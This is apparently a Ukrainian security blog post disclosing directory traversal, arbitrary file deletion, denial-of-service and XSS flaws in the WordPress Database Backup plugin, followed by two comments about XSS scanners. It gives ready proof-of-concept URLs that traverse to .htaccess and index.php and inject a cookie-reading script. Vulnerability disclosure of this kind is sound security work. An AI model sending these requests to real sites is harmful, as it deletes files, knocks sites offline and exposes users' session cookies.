Directory traversal, Arbitrary file deletion, DoS та XSS в WordPress

23:49 27.12.2007

В червні, 05.06.2007, я знайшов Directory traversal, Arbitrary file deletion та Denial of Service уразливості в WordPress. А 28.10.2007 ще додатково Cross-Site Scripting уразливість. Дірки в файлі wp-db-backup.php - в плагіні WordPress Database Backup.

В минулому році була знайдена Directory traversal уразливість в плагіні WordPress WP-DB Backup. Котра була виправлена в WP 2.0.4.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Як я виявив даний плагін також вразливий до атаки з використанням зворотнього слеша (що працює лише на Windows), про котру я писав раніше стосовно іншої дірки в цьому движку - Local file include та Directory traversal в WordPress.

Directory Traversal:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Ця дірка також вже була виправлена в WP 2.0.4. Тому вразлива WordPress 2.0.3 і попередні версії. Окрім Directory traversal, я ще виявив інші уразливості.

Також можливо видалити довільний файл на сервері (на котрий має права даний користувач). Тому що плагін WordPress Database Backup видаляє файли, до котрих відбувається запит - причому незалежно від того, чи скачає користувач файл, чи ні, в будь-якому випадку файл видаляється.

Arbitrary file deletion:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../.htaccess

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\.htaccess

Це також може бути використано для проведення DoS-атаки. При видаленні index.php сайт перестане нормально функціонувати.

DoS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=../../index.php

Тільки на Windows:
http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=\..\..\index.php

Вразлива WordPress 2.0.3 і попередні версії.

XSS:

http://site/wp-admin/edit.php?page=wp-db-backup.php&backup=%3Cscript%3Ealert(document.cookie)%3C/script%3E

Вразливі версії WordPress <= 2.0.11 та потенційно наступні версії (2.1.x, 2.2.x та 2.3.x).


2 відповідей на “Directory traversal, Arbitrary file deletion, DoS та XSS в WordPress”

  1. Катюха каже:

    Що до мене, я користуюся таким сервiсом для пошуку XSS уразливістей:
    xss-scanner.com

  2. MustLive каже:

    Катюха

    Якщо тобі вистачає цього сервіса, то, будь ласка, користуйся. Але сильно на нього не надійся ;-) .

    Тому що, по-перше, всі сканери недостатньо ефективні (навіть стосовно пошуку XSS уразливостей). Що безкоштовні, що комерційні сканери - жоден з них не знайде усіх уразливостей, як це може зробити професіонал з веб безпеки. Зокрема, я не поважаю жодних сканерів і регулярно публікую інформацію про дірки на сайтах секюріті компаній, в тому числі й виробників секюріті сканерів.

    По-друге, даний сервіс призначений лише для пошуку XSS уразливостей. А існує ще чимало інших класів уразливостей, на наявність яких також потрібно перевіряти сайти. Так що ефективність даного сканеру дуже мала, що в порівнянні з іншими повнофункціональними сканерами, що в порівнянні з ручною перевіркою безпеки.

Leave a Reply

You must be logged in to post a comment.